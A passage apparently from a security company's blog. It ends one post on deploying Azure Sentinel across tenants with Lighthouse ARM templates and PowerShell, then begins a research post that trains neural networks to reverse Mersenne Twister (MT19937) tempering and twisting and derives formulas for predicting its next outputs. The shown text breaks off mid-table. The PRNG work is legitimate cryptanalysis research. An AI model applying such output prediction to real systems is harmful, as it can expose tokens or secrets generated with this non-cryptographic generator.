[string]$templateParameterFile='',
[string]$AadGroupID='',
[string]$tenantId=''
)
$config = Get-Content -Path $customerConfig |ConvertFrom-Json
$parameters = (Get-Content -Path $templateParameterFile -Raw) -replace '{principalId}' , $AadGroupID

Set-Content -Value $parameters -Path $templateParameterFile -Force
New-AzDeployment -Name "Lighthouse" -Location "$($config.Location)" -TemplateFile $templateFile -TemplateParameterFile $templateParameterFile -rgName "$($config.TargetResourceGroup)" -managedByTenantId "$tenantId" 

This script takes in the config file we generated earlier to read out client or  sub tenant values for location and the resource group in the sub tenant then sets up Lighthouse with the below ARM template / parameter file after replacing the ’principalID’ placeholder in the config with the Azure AD group ID we set up earlier.

Note that in the Lighthouse ARM template  and parameter file, we are keeping the permissions to an absolute minimum, so users in the Azure AD group in the master tenant will only be able to interact with the permissions granted using the role definition IDs specified.

If you are setting up Lighthouse for the management of additional parts of the Sub tenant you can add andchange the role definition IDs to suit your needs.

Lighthouse.parameters.json

{
  "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentParameters.json#",
  "contentVersion": "1.0.0.0",
  "parameters": {
    "mspOfferName": {
      "value": "Enter Offering Name"
    },
    "mspOfferDescription": {
      "value": "Enter Description"
    },
    "managedByTenantId": {
      "value": "ID OF YOUR MASTER TENANT"
    },
    "authorizations": {
      "value": [
        {
          "principalId": "{principalId}",
          "roleDefinitionId": "ab8e14d6-4a74-4a29-9ba8-549422addade",
          "principalIdDisplayName": " Sentinel Contributor"
        },
        {
          "principalId": "{principalId}",
          "roleDefinitionId": "3e150937-b8fe-4cfb-8069-0eaf05ecd056",
          "principalIdDisplayName": " Sentinel Responder"
        },
        {
          "principalId": "{principalId}",
          "roleDefinitionId": "8d289c81-5878-46d4-8554-54e1e3d8b5cb",
          "principalIdDisplayName": "Sentinel Reader"
        },
        {
          "principalId": "{principalId}",
          "roleDefinitionId": "f4c81013-99ee-4d62-a7ee-b3f1f648599a",
          "principalIdDisplayName": "Sentinel Automation Contributor"
        }
      ]
    },
    "rgName": {
      "value": "RG-Sentinel"
    }
  }
}


Lighthouse.json

{
    "$schema": "https://schema.management.azure.com/schemas/2018-05-01/subscriptionDeploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "parameters": {
"mspOfferName": {"type": "string",},"mspOfferDescription": {"type": "string",}, "managedByTenantId": {"type": "string",},"authorizations": {"type": "array",}, "rgName": {"type": "string"}},
    "variables": {
        "mspRegistrationName": "[guid(parameters('mspOfferName'))]",
        "mspAssignmentName": "[guid(parameters('rgName'))]"},
    "resources": [{
            "type": "Microsoft.ManagedServices/registrationDefinitions",
            "apiVersion": "2019-06-01",
            "name": "[variables('mspRegistrationName')]",
            "properties": {
                "registrationDefinitionName": "[parameters('mspOfferName')]",
                "description": "[parameters('mspOfferDescription')]",
                "managedByTenantId": "[parameters('managedByTenantId')]",
                "authorizations": "[parameters('authorizations')]"
            }},
        {
            "type": "Microsoft.Resources/deployments",
            "apiVersion": "2018-05-01",
            "name": "rgAssignment",
            "resourceGroup": "[parameters('rgName')]",
            "dependsOn": [
                "[resourceId('Microsoft.ManagedServices/registrationDefinitions/', variables('mspRegistrationName'))]"],
            "properties":{
                "mode":"Incremental",
                "template":{
                    "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
                    "contentVersion": "1.0.0.0",
                    "parameters": {},
                    "resources": [
                        {
                            "type": "Microsoft.ManagedServices/registrationAssignments",
                            "apiVersion": "2019-06-01",
                            "name": "[variables('mspAssignmentName')]",
                            "properties": {
                                "registrationDefinitionId": "[resourceId('Microsoft.ManagedServices/registrationDefinitions/', variables('mspRegistrationName'))]"
} } ]} } }],
    "outputs": {
        "mspOfferName": {
            "type": "string",
            "value": "[concat('Managed by', ' ', parameters('mspOfferName'))]"
        },
        "authorizations": {
            "type": "array",
            "value": "[parameters('authorizations')]"
        }}}

Enable Connectors

At the time of creating this solution, there were still a few connectors that could not be set via ARM and I imagine this will still be the case for new connectors as they get added to Sentinel, so I will provide the different ways of handling both deployment types and how to find out what body to include in the posts to the API.

For most connectors you can use existing solutions such as:

 Roberto Rodriquez’s Azure-Sentinel2Go 

Or

GitHub – javiersoriano/sentinel-all-in-one

First, we install the required modules and get the list of connectors to enable for our client / sub tenant, then, compare them to the list of connectors that are already enabled

param(
    [string]$templateLocation = '',
    [string]$customerConfig 
)
$config = Get-Content -Path $customerConfig |ConvertFrom-Json
$connectors=$config.connectors
$resourceGroupName = $config.TargetResourceGroup
$WorkspaceName = $config.TargetWorkspaceName
$templateLocation

Install-Module AzSentinel -Scope CurrentUser -Force

$connectorList = $connectors -split ','
$rg = Get-AzResourceGroup -Name $resourceGroupName
$check = Get-AzSentinelDataConnector -WorkspaceName $WorkspaceName | select-object -ExpandProperty kind
$outputArray = $connectorList | Where-Object {$_ -notin $check} 
$tenantId = (get-azcontext).Tenant.Id
$subscriptionId = (Get-AzSubscription).Id

$Resource = "https://management.azure.com/"

Next, we attempt to deploy the connectors using the ARM templates from one of the above solutions.

foreach($con in $outputArray)
{
    write-host "deploying $($con)"
    $out = $null 
   $out=  New-AzResourceGroupDeployment -resourceGroupName "$($resourceGroupName)" -TemplateFile $templateLocation -dataConnectorsKind "$($con)"-workspaceName "$($WorkspaceName)" -securityCollectionTier "ALL" -tenantId "$($tenantId)" -subscriptionId "$($subscriptionId)" -mcasDiscoveryLogs $true -Location $rg.Location -ErrorAction SilentlyContinue
   if($out.ProvisioningState -eq "Failed")
   {
       write-host '------------------------'
       write-host "Unable to deploy $($con)"
       $out | Format-Table
       write-host '------------------------'
       Write-Host  "##vso[task.LogIssue type=warning;]Unable to deploy $($con) CorrelationId: $($out.CorrelationId)"
   }
   else{
       write-host "deployed $($con)"
   }

If the connector fails to deploy, we write a warning message to the pipeline.

This will work for most connectors and might be all you need for your requirements.

If there is a connector not currently available such as the Active Directory Diagnostics one was when I created this, we need to use a different approach. Thanks to Roberto Rodriguez for the suggestion.

  1. Using your favourite Browser, go to an existing Sentinel instance that allows you to enable the connector you need.
  2. Go through the steps of enabling the connector, then on the last step when submitting open the debug console (Dev tools) in your browser and on the Network tab look through the posts made.
  3. There should be one containing the payload for the connector you just enabled with the correct settings and URL to post to.
  4. Now we can replicate this payload in PowerShell and enable them automatically.

When enabling the connector, note the required permissions needed and ensure your ADO service connection meets the requirements!

Create the URI using the URL from the post message, replacing required values such as workspace name with the one used for your target environment

Example:

$uri = "/providers/microsoft.aadiam/diagnosticSettings/AzureSentinel_$($WorkspaceName)?api-version=2017-04-01"

Build up the JSON post message starting with static bits

           $payload =         '{
            "kind": "AzureActiveDirectoryDiagnostics",
            "properties": {
                "logs": [
                    {
                        "category": "SignInLogs",
                        "enabled": true
                    },
                    {
                        "category": "AuditLogs",
                        "enabled": true
                    },
                    {
                        "category": "NonInteractiveUserSignInLogs",
                        "enabled": true
                    },
                    {
                        "category": "ServicePrincipalSignInLogs",
                        "enabled": true
                    },
                    {
                        "category": "ManagedIdentitySignInLogs",
                        "enabled": true
                    },
                    {
                        "category": "ProvisioningLogs",
                        "enabled": true
                    }
                ]
            }
        }'|ConvertFrom-Json

Add additional required properties that were not included in the static part:

        $connectorProperties =$ payload.properties
        $connectorProperties | Add-Member -NotePropertyName workspaceId -NotePropertyValue "/subscriptions/$($subscriptionId)/resourceGroups/$($resourceGroupName)/providers/Microsoft.OperationalInsights/workspaces/$($WorkspaceName)"

        $connectorBody = @{}

        $connectorBody | Add-Member -NotePropertyName name -NotePropertyValue "AzureSentinel_$($WorkspaceName)"
        $connectorBody.Add("properties",$connectorProperties)

And finally, try firing the request at Azure with a bit of error handling to write a warning to the pipeline if something goes wrong.

        try {
            $result = Invoke-AzRestMethod -Path $uri -Method PUT -Payload ($connectorBody | ConvertTo-Json -Depth 3)
            if ($result.StatusCode -eq 200) {
                Write-Host "Successfully enabled data connector: $($payload.kind)"
            }
            else {
                Write-Host  "##vso[task.LogIssue type=warning;]Unable to deploy $($con)  with error: $($result.Content)" 
            }
        }
        catch {
            $errorReturn = $_
            Write-Verbose $_
            Write-Host  "##vso[task.LogIssue type=warning;]Unable to deploy $($con)  with error: $errorReturn" 
        }

Phase 2: Deploy Sentinel analytics to Master tenant pointed at Sub tenant logs

If you followed all the above steps and onboarded a sub tenant and are in the Azure AD group, you should now be able to see the sub tenants Log analytics workspace in your Master Tenant Sentinel, at this stage you can also remove the service principle in the sub tenant.

If you cannot see it:

It sometimes takes 30+ minutes for Lighthouse connected tenants to show up in the master tenant.

Ensure you have the sub tenant selected in “Directories + Subscriptions”

In Sentinel, make sure the subscription is selected in your filter

Deploying a new analytic

First load a template analytic.

If you just exported the analytics from an existing Sentinel instance you just need to make sure you set the workspace inside of the query to the correct one.

$alert = (Get-Content -Path $file.FullName) |ConvertFrom-Json  
$analyticsTemplate =$ alert.detection_query  -replace '{{targetWorkspace}}' , ($config.TargetWorkspaceName) 

In my case, I am loading a custom analytics file, so need to combine it with my template file so need to set a few more bits.

  $alert = (Get-Content -Path $file.FullName) |ConvertFrom-Json 
      $workspaceName = '$(naming.LogAnalyticsWorkspace)'
      $resourceGroupName= '$(naming.CustomerResourceGroup)'
      $id = New-Guid
      $analyticsTemplate = (Get-Content -Path $detectionPath )  -replace '{DisplayPrefix}' , 'Sentinel-' -replace '{DisplayName}' , $alert.display_name   -replace '{DetectionName}' , $alert.detection_name  -replace '{{targetWorkspace}}' , ($config.TargetWorkspaceName) |ConvertFrom-Json 
      
      $QueryPeriod =([timespan]$alert.Interval)
      $lookbackPeriod = ([timespan]$alert.LookupPeriod)
      $SuppressionDuration = ([timespan]$alert.LookupPeriod)
      
      $alert.detection_query=$alert.detection_query  -replace '{{targetWorkspace}}' , ($config.TargetWorkspaceName)
      $alert.detection_query
      $tempDescription = $alert.description
      $analyticsTemplate.Severity = $alert.severity 

Create the analytic in Sentinel

When creating the analytics, you can either

  1. put them directly into the Analytics workspace that is now visible in the Master tenant through Lighthouse
  2. create a new workspace, and point the analytics at the other workspace by adding workspace(targetworkspace) to all tables in your analytics for example workspace(targetworkspace).DeviceEvents.

The latter solution keeps all the analytics in the Master tenant, so all queries can be stored there and do not go into the sub tenant (can be useful for protecting intellectual property or just having all analytics in one single workspace pointing at all the others).

At the time of creating the automated solution for this, I had a few issues with the various ways of deploying analytics, which have hopefully been solved by now. Below is my workaround that is still fully functional.

  • The Az.SecurityInsights version of New-AzSentinelAlertRule did not allow me to set tactics on the analytic.
  • The azsentinel version did have a working way to add tactics, but failed to create the analytic properly
  • neither of them worked with adding entities.

So in a rather unpleasant solution I:

  1. Create the initial analytic using Az.SecurityInsights\New-AzSentinelAlertRule
    1. Add the tactic in using azsentinel\New-AzSentinelAlertRule
    1. Add the entities and final settings in using the API
  Az.SecurityInsights\New-AzSentinelAlertRule -WorkspaceName $workspaceName -QueryPeriod $lookbackPeriod -Query $analyticsTemplate.detection_query -QueryFrequency $QueryPeriod -ResourceGroupName $resourceGroupName -AlertRuleId $id -Scheduled -Enabled  -DisplayName $analyticsTemplate.DisplayName -Description $tempDescription -SuppressionDuration $SuppressionDuration -Severity $analyticsTemplate.Severity -TriggerOperator $analyticsTemplate.TriggerOperator -TriggerThreshold $analyticsTemplate.TriggerThreshold 
       $newAlert =azsentinel\Get-AzSentinelAlertRule -WorkspaceName $workspaceName  | where-object {$_.name -eq $id}
       $newAlert.Query =  $alert.detection_query
      $newAlert.enabled = $analyticsTemplate.Enabled
       azsentinel\New-AzSentinelAlertRule -WorkspaceName $workspaceName -Kind $newAlert.kind -SuppressionEnabled $newAlert.suppressionEnabled -Query $newAlert.query -DisplayName $newAlert.displayName -Description $newAlert.description -Tactics $newAlert.tactics -QueryFrequency $newAlert.queryFrequency -Severity $newAlert.severity -Enabled $newAlert.enabled -QueryPeriod $newAlert.queryPeriod -TriggerOperator $newAlert.triggerOperator -TriggerThreshold $newAlert.triggerThreshold -SuppressionDuration $newAlert.suppressionDuration 
      
      $additionUri = $newAlert.id + '?api-version=2021-03-01-preview'
      $additionUri
      $result = Invoke-AzRestMethod -Path $additionUri -Method Get
      $entityCont ='[]'| ConvertFrom-Json
        $entities = $alert.analyticsEntities.entityMappings | convertto-json -Depth 4
        $content  = $result.Content | ConvertFrom-Json
        $tactics= $alert.tactic.Split(',') | ConvertTo-Json
      $aggregation = 'SingleAlert'
      if($alert.Grouping)
      {
      if($alert.Grouping -eq 'AlertPerResult')
      {
        $aggregation = 'AlertPerResult'
      }}

      $body = '{"id":"'+$content.id+'","name":"'+$content.name+'","type":"Microsoft.SecurityInsights/alertRules","kind":"Scheduled","properties":{"displayName":"'+$content.properties.displayName+'","description":"'+$content.properties.description+'","severity":"'+$content.properties.severity+'","enabled":true,"query":'+($content.properties.query |ConvertTo-Json)+',"queryFrequency":"'+$content.properties.queryFrequency+'","queryPeriod":"'+$content.properties.queryPeriod+'","triggerOperator":"'+$content.properties.triggerOperator+'","triggerThreshold":'+$content.properties.triggerThreshold+',"suppressionDuration":"'+$content.properties.suppressionDuration+'","suppressionEnabled":false,"tactics":'+$tactics+',"alertRuleTemplateName":null,"incidentConfiguration":{"createIncident":true,"groupingConfiguration":{"enabled":false,"reopenClosedIncident":false,"lookbackDuration":"PT5H","matchingMethod":"AllEntities","groupByEntities":[],"groupByAlertDetails":[],"groupByCustomDetails":[]}},"eventGroupingSettings":{"aggregationKind":"'+$aggregation+'"},"alertDetailsOverride":null,"customDetails":null,"entityMappings":'+ $entities +'}}'
     
 $res = Invoke-AzRestMethod -path $additionUri -Method Put -Payload $body 

You should now have all the components needed to create your own multi-Tenant enterprise scale pipelines.

The value from this solution comes from:

  1. Being able to quickly push custom made analytics to a multitude of workspaces
  2. Being able to source control analytics and code review them before deploying
  3. Having the ability to manage all sub tenants from the same master tenant without having to create accounts in each tenant
  4. Consistent RBAC for all tenants
  5. A huge amount of room to extend on this solution.


As mentioned at the start, this blog post only covers a small part of the overall deployment strategy we have at NCC Group, to illustrate the overall deployment workflow we’ve taken for Azure Sentinel. Upon this foundation, we’ve built a substantial ecosystem of custom analytics to support advanced detection and response.

Cracking Random Number Generators using Machine Learning – Part 2: Mersenne Twister

18 October 2021 at 13:00

Outline

1. Introduction

In part 1 of this post, we showed how to train a Neural Network to generate the exact sequence of a relatively simple pseudo-random number generator (PRNG), namely xorshift128. In that PRNG, each number is totally dependent on the last four generated numbers (which form the random number internal state). Although ML had learned the hidden internal structure of the xorshift128 PRNG, it is a very simple PRNG that we used as a proof of concept.

The same concept applies to a more complex structured PRNG, namely Mersenne Twister (MT). MT is by far the most widely used general-purpose (but still: not cryptographically secure) PRNG [1].  It can have a very long period of 32bit words with a statistically uniform distribution. There are many variants of the MT PRNG that follows the same algorithm but differ in the constants and configurations of the algorithm. The most commonly used variant of MT is MT19937. Hence, for the rest of this article, we will focus more on this variant of MT.

To crack the MT algorithm, we need first to examine how it works. In the next section, we will discuss how MT works.

** Editor’s Note: How does this relate to security? While both the research in this blog post (and that of Part 1 in this series) looks at a non-cryptographic PRNG, we are interested, generically, in understanding how machine learning-based approaches to finding latent patterns within functions presumed to be generating random output could work, as a prerequisite to attempting to use machine learning to find previously-unknown patterns in cryptographic (P)RNGs, as this could potentially serve as an interesting supplementary method for cryptanalysis of these functions. Here, we show our work in beginning to explore this space, extending the approach used for xorshift128 to Mersenne Twister, a non-cryptographic PRNG sometimes mistakenly used where a cryptographically-secure PRNG is required. **

2. How does MT19937 PRNG work?

MT can be considered as a twisted form of the generalized Linear-feedback shift register (LFSR). The idea of LFSR is to use a linear function, such as XOR, with the old register value to get the register’s new value. In MT, the internal state is saved in the form of a sequence of 32-bit words. The size of the internal state is different based on the MT variant, which in the case of  MT19937 is 624. The pseudocode of MT is listed below as shared in Wikipedia.

 // Create a length n array to store the state of the generator
 int[0..n-1] MT
 int index := n+1
 const int lower_mask = (1 << r) - 1 // That is, the binary number of r 1's
 const int upper_mask = lowest w bits of (not lower_mask)
 
 // Initialize the generator from a seed
 function seed_mt(int seed) {
     index := n
     MT[0] := seed
     for i from 1 to (n - 1) { // loop over each element
         MT[i] := lowest w bits of (f * (MT[i-1] xor (MT[i-1] >> (w-2))) + i)
     }
 }
 
 // Extract a tempered value based on MT[index]
 // calling twist() every n numbers
 function extract_number() {
     if index >= n {
         if index > n {
           error "Generator was never seeded"
           // Alternatively, seed with constant value; 5489 is used in reference C code[53]
         }
         twist()
     }
 
     int y := MT[index]
     y := y xor ((y >> u) and d)
     y := y xor ((y << s) and b)
     y := y xor ((y << t) and c)
     y := y xor (y >> l)
 
     index := index + 1
     return lowest w bits of (y)
 }
 
 // Generate the next n values from the series x_i 
 function twist() {
     for i from 0 to (n-1) {
         int x := (MT[i] and upper_mask)
                   + (MT[(i+1) mod n] and lower_mask)
         int xA := x >> 1
         if (x mod 2) != 0 { // lowest bit of x is 1
             xA := xA xor a
         }
         MT[i] := MT[(i + m) mod n] xor xA
     }
     index := 0
 } 

The first function is seed_mt, used to initialize the 624 state values using the initial seed and the linear XOR function. This function is straightforward, but we will not get in-depth of its implementation as it is irrelevant to our goal. The main two functions we have are extract_number and twist. extract_number function is called every time we want to generate a new random value.  It starts by checking if the state is not initialized; it either initializes it by calling seed_mt with a constant seed or returns an error. Then the first step is to call the twist function to twist the internal state, as we will describe later. This twist is also called every 624 calls to the extract_number function again. After that, the code uses the number at the current index (which starts with 0 up to 623) to temper one word from the state at that index using some linear XOR, SHIFT, and AND operations. At the end of the function, we increment the index and return the tempered state value. 

The twist function changes the internal states to a new state at the beginning and after every 624 numbers generated. As we can see from the code, the function uses the values at indices i, i+1, and i+m to generate the new value at index i using some XOR, SHIFT, and AND operations similar to the tempering function above.

Please note that w, n, m, r, a, u, d, s, b, t, c, l, and f are predefined constants for the algorithm that may change from one version to another. The values of these constants for MT19937 are as follows:

  • (wnmr) = (32, 624, 397, 31)
  • a = 9908B0DF16
  • (ud) = (11, FFFFFFFF16)
  • (sb) = (7, 9D2C568016)
  • (tc) = (15, EFC6000016)
  • l = 18
  • f = 1812433253

3. Using Neural Networks to model the MT19937 PRNG

As we saw in the previous section, MT can be split into two main steps, twisting and tempering steps. The twisting step only happens once every n calls to the PRNG (where n equals 624 in MT19937) to twist the old state into a new state. The tempering step happens with each number generated to convert one of the 624 states to a random number. Hence, we are planning to use two NN models to learn each step separately. Then we will use the two models to reverse the whole PRNG by using the reverse tempering model to get from a generated number to its internal state then use the twisting model to produce the new state. Then, we can temper the generated state to get to the expected new PRNG number.

3.1 Using NN for State Twisting

After checking the code listing for the twisting function line 46, we can see that the new state at the position, i, depends on the variable xA and the value of the old state value at position (i + m), where m equals 397 in MT19937. Also, the value of xA depends on the value of the variable x and some constant a. And the value of the variable x depends on the old state’s values at positions i and i + 1.

Hence, we can deduce that, and without getting into the details, each new twisted state depends on three old states as follows:

MT[i] = f(MT[i - 624], MT[i - 624 + 1], MT[i - 624 + m])

    = f(MT[i - 624], MT[i - 623], MT[i - 227])     ( using m = 397 as in MT19937 )

We want to train an NN model to learn the function f hence effectively replicating the twisting step. To accomplish this, we have created a different function that generates the internal state (without tempering) instead of the random number. This allows us to correlate the internal states with each other, as described in the above formula.

3.1.1 Data Preparation

We have generated a sequence of 5,000,000 32bits words of states. We then formatted these states into three 32bits inputs and one 32bits output. This would create around a five million records dataset (5 million – 624). Then we split the data into training and testing sets, with only 100,000 records for the test set, and the rest of the data is used for training.

3.1.2 Neural Network Model Design

Our proposed model would have 96 inputs in the input layer to represent the old three states at the specific locations described in the previous equation, 32-bit each, and 32 outputs in the output layer to represent the new 32-bit state. The main hyperparameters that we need to decide are the number of neurons/nodes and hidden layers. We have tested different models’ structures with different hidden layers and a different number of neurons in each layer. Then we used Keras’ BayesianOptimization to select the optimal number of hidden layers/neurons along with other optimization parameters (such as learning rate, … etc.). We used a small subset of the training set as the training set for this optimization. We have got multiple promising model structures. Then, we used the smallest model structure that had the most promising result.  

3.1.3 Optimizing the NN Inputs

After training multiple models, we noticed that the weights that connect the first 31-bit of the  96 input bits to the first hidden layer nodes are almost always close to zero. This implies that those bits have no effects on the output bits, and hence we can ignore them in our training. To check our observation with the MT implementation, we noticed that the state at position i is bitwise ANDed with a bitmask called upper_mask which, when we checked, has a value of 1 in the MSB and 0 for the rest when using r with the value of 31 as stated in MT19937. So, we only need the MSB of the state at position i. Hence, we can train our NN with only 65bits inputs instead of 96.

Hence, our neural network structure ended up with the following model structure (the input layer is ignored):

_________________________________________________________________
Layer (type)                 Output Shape              Param #   
=================================================================
dense (Dense)                (None, 96)                6336      
_________________________________________________________________
dense_1 (Dense)              (None, 32)                3104      
=================================================================
Total params: 9,440
Trainable params: 9,440
Non-trainable params: 0
_________________________________________________________________

As we can see, the number of the parameters (weights and biases) of the hidden layer is only 6,336 (65×96 weights + 96 biases), and the number of the parameters of the output layer is 3,104 (96×32 weights + 32 biases), which gets to a total of 9,440 parameters to train. The hidden layer activation function is relu, while the output layer activation function is sigmoid as we expect it to be a binary output. Here is the summary of the model parameters:

Twisting Model
Model Type Dense Network
#Layers 2
#Neurons 128 Dense
#Trainable Parameters 9,440
Activation Functions Hidden Layer: relu
Output Layer: sigmoid
Loss Function binary_crossentropy

3.1.4 Model Results

After a few hours and manual tweaking of the model architecture, we have trained a model that has achieved 100% bitwise accuracy for both the training and testing sets. To be more confident about what we have achieved, we have generated a new sample of 1000,000 states generated using a different seed than the one used to generate the previous data. We got the same result of 100% bitwise accuracy when we tested with the newly generated data.

This means that the model has learned the exact formula that relates each state to the three previous states. Hence if we got access to the three internal states at those specific locations, we could predict the next state. But, usually, we can get access only to the old random numbers, not the internal states. So, we need a different model that can reverse the generated tempered number to its equivalent internal state. Then we can use this model to create the new state. Then, we can use the normal tempering step to get to the new output. But before we get to that, let’s do model deep dive.

3.1.5 Model Deep Dive

This section will deep dive into the model to understand more what it has learned from the State relations data and if it matches our expectations. 

3.1.5.1 Model First Layer Connections

As discussed in Section 2, each state depends on three previous states, and we also showed that we only need the MSB (most significant bit) of the first state; hence we had 65bits as input. Now, we would like to examine whether all 65 input bits have the same effects on the 64 output bits? In other words, do all the input bits have more or less the same importance for the outputs? We can use the NN weights that connect the 65 inputs in the input layer to the hidden layer, the 96 hidden nodes, of our trained model to determine the importance of each bit. The following figure shows the weights connecting each input, in x-axes, to the 96 hidden nodes in the hidden layer:

We can notice that the second bit, which corresponds to the second state LSB, is connected to many hidden layer nodes, implying that it affects multiple bits in the output. Comparing this observation against the code listed in Section 2 corresponds to the if-condition that checks the LSB bit, and based on its value, it may XOR the new state with a constant value that dramatically affects the new state.

We can also notice that the 33rd input, marked on the figure, is almost not connected to any hidden layer nodes as all the weights are close to zero. This can also be mapped to the code in line 12, where we bit masked the second state to  0x7FFFFFFF in MT19937, which basically neglects the MSB altogether.

3.1.5.2 The Logic Closed-Form from the State Twisting Model Output

After creating a model that can replicate the twist operation of the states, we would like to see if we can possibly get to the logic closed form using the trained model. Of course, we can derive the closed-form by building all the 65bit input variations and testing each input combination’s outputs (2^65) and derive the closed-form. But this approach is tedious and requires lots of evaluations. Instead, we can test the effect of each input on each output separately. This can be done by using the training set and sticking each input bit individually, one time at 0 and one time at 1, and see which bits in the output are affected. This will show how which bits in the inputs affecting each bit in the output. For example, when we checked the first input, which corresponds to MSB of the first state, we found it only affects bit 30 in the output. The following table shows the effect of each input bit on each output bit:

Input Bits Output Bits
0   [30]
1   [0, 1, 2, 3, 4, 6, 7, 12, 13, 15, 19, 24, 27, 28, 31]
2   [0]
3   [1]
4   [2]
5   [3]
6   [4]
7   [5]
8   [6]
9   [7]
10   [8]
11   [9]
12   [10]
13   [11]
14   [12]
15   [13]
16   [14]
17   [15]
18   [16]
19   [17]
20   [18]
21   [19]
22   [20]
23   [21]
24   [22]
25   [23]
26   [24]
27   [25]
28   [26]
29   [27]
30   [28]
31   [29]
32   []
33   [0]
34   [1]
35   [2]
36   [3]
37   [4]
38   [5]
39   [6]
40   [7]
41   [8]
42   [9]
43   [10]
44   [11]
45   [12]
46   [13]
47   [14]
48   [15]
49   [16]
50   [17]
51   [18]
52   [19]
53   [20]
54   [21]
55   [22]
56   [23]
57   [24]
58   [25]
59   [26]
60   [27]
61   [28]
62   [29]
63   [30]
64   [31]

We can see that inputs 33 to 64, which corresponds to the last state, are affecting bits 0 to 31 in the output. We can also see that inputs 2 to 31, which corresponds to the second state from bit 1 to bit 30 (ignoring the LSB and MSB), affect bits 0 to 29 in the output. And as we know, we are using the XOR logic function in the state evaluation. We can formalize the closed-form as follows (ignoring bit 0 and bit 1 in the input for now):

          MT[i] = MT[i - 227] ^ ((MT[i - 623] & 0x7FFFFFFF) >> 1)

This formula is so close to the result. We need to add the effect of input bits 0 and 1. For input number 0, which corresponds to the first state MSB, it is affecting bit 30. Hence we can update the above closed-form to be:

          MT[i] = MT[i - 227] ^ ((MT[i - 623] & 0x7FFFFFFF) >> 1) ^ ((MT[i - 624] & 0x80000000) << 1)

Lastly, the first bit in the input, which corresponds to the second state LSB, affects 15 bits in the output. As we are using it in an XOR function, if this bit is 0, it does not affect the output, but if it has a value of one, it will affect all the listed 15bits (by XORing them). If we formulate these 15 bits into a hexadecimal value, we will get 0x9908B0DF (which corresponds to the constant a in MT19937). Then we can include this to the closed-form as follows:

          MT[i] = MT[i - 227] ^ ((MT[i - 623] & 0x7FFFFFFF) >> 1) ^ ((MT[i - 624] & 0x80000000) << 1) ^ ((MT[i - 623] & 1) * 0x9908B0DF)

So, if the LSB of the second state is 0, the result of the ANDing will be 0, and hence the multiplication will result in 0. But if the LSB of the second state is 1, the result of the ANDing will be 1, and hence the multiplication will result in 0x9908B0DF. This is equivalent to the if-condition in the code listing. We can rewrite the above equation to use the circular buffer as follows:

          MT[i] = MT[(i + 397) % 624] ^ ((MT[(i + 1) % 624] & 0x7FFFFFFF) >> 1) ^ ((MT[i] & 0x80000000) << 1) ^ ((MT[(i + 1) % 624] & 1) * 0x9908B0DF)

Now let’s check how to reverse the tempered numbers to the internal states using an ML model.

3.2 Using NN for State Tempering

We plan to train a neural network model for this phase to reverse the state tempering introduced in the code listing from line 10 to line 20. As we can see, a series of XORing and shifting is done to the state at the current index to generate the random number. So, we have updated the code to generate the state before and after the state tempering to be used as inputs and outputs for the Neural network.

3.2.1 Data Preparation

We have generated a sequence of 5,000,000 32 bit words of states and their tempered values. Then we used the tempered states as inputs and the original states as outputs. This would create a 5 million records dataset. Then we split the data into training and testing sets, with only 100,000 records for the test set, and the rest of the data is used for training.

3.2.2 Neural Network Model Design

Our proposed model would have 32 inputs in the input layer to represent the tempered state values and 32 outputs in the output layer to represent the original 32-bit state. The main hyperparameter that we need to decide is the number of neurons/nodes and hidden layers. We have tested different models’ structures with a different number of hidden layers and neurons in each layer, similar to what we did in the NN model before. We also used the smallest model structure that has the most promising result. Hence, our neural network structure ended up with the following model structure (the input layer is ignored):

_________________________________________________________________
Layer (type)                 Output Shape              Param #   
=================================================================
dense (Dense)                (None, 640)               21120     
_________________________________________________________________
dense_1 (Dense)              (None, 32)                20512     
=================================================================
Total params: 41,632
Trainable params: 41,632
Non-trainable params: 0
_________________________________________________________________

As we can see, the number of the parameters (weights and biases) of the hidden layer is only 21,120 (32×640 weights + 640 biases), and the number of the parameters of the output layer is 20,512 (640×32 weights + 32 biases), which gets to a total of 41,632 parameters to train. We can notice that this model is much bigger than the model for twisting as the operations done in tempering is much more complex than the operations done there. Similarly, the hidden layer activation function is relu, while the output layer activation function is sigmoid as we expect it to be a binary output. Here is the summary of the model parameters:

Tempering Model
Model Type Dense Network
#Layers 2
#Neurons 672 Dense
#Trainable Parameters 41,632
Activation Functions Hidden Layer: relu
Output Layer: sigmoid
Loss Function binary_crossentropy

3.2.3 Model Results

After manual tweaking of the model architecture, we have trained a model that has achieved 100% bitwise accuracy for both the training and testing sets. To be more confident about what we have achieved, we have generated a new sample of 1000,000 states and tempered states using a different seed than those used to generate the previous data. We got the same result of 100% bitwise accuracy when we tested with the newly generated data.

This means that the model has learned the exact inverse formula that relates each tempered state to its original state. Hence, we can use this model to reverse the generated numbers corresponding to the internal states we need for the first model. Then we can use the twisting model to get the new state. Then, we can use the normal tempering step to get to the new output. But before we get to that, let’s do a model deep dive.

3.2.4 Model Deep Dive

This section will deep dive into the model to understand more what it has learned from the State relations data and if it matches our expectations. 

3.2.4.1 Model Layers Connections

After training the model, we wanted to test if any bits are not used or are less connected. The following figure shows the weights connecting each input, in x-axes, to the 640 hidden nodes in the hidden layer (each point represents a hidden node weight):

As we can see, each input bit is connected to many hidden nodes, which implies that each bit in the input has more or less weight like others. We also plot in the following figure the connections between the hidden layer and the output layer:

The same observation can be taken from the previous figure, except that maybe bits 29 and 30 are less connected than others, but they are still well connected to many hidden nodes.

3.2.4.2 The Logic Closed-Form from the State Tempering Model Output

In the same way, we did with the first model, we can derive a closed-form logic expression that reverses the tempering using the model output. But, instead of doing so, we can derive a closed-form logic expression that uses the generated numbers at the positions mentioned in the first part to reverse them to the internal states, generate the new states and then generate the new number in one step. So, we plan to connect three models of the reverse tempering models to one model that generates the new state and then temper the output to get to the newly generated number as shown in the following figure:

Now we have 3 x 32 bits inputs and 32 bits output. Using the same approach described before, we can test the effect of each input on each output separately. This will show how each bit in the input bits affecting each bit in the output bits. The following table shows the input-output relations:

Input Index Input Bits Output Bits
0 0   []
0 1   []
0 2   [1, 8, 12, 19, 26, 30]
0 3   []
0 4   []
0 5   []
0 6   []
0 7   []
0 8   []
0 9   [1, 8, 12, 19, 26, 30]
0 10   []
0 11   []
0 12   []
0 13   []
0 14   []
0 15   []
0 16   [1, 8, 12, 19, 26, 30]
0 17   [1, 8, 12, 19, 26, 30]
0 18   []
0 19   []
0 20   [1, 8, 12, 19, 26, 30]
0 21   []
0 22   []
0 23   []
0 24   [1, 8, 12, 19, 26, 30]
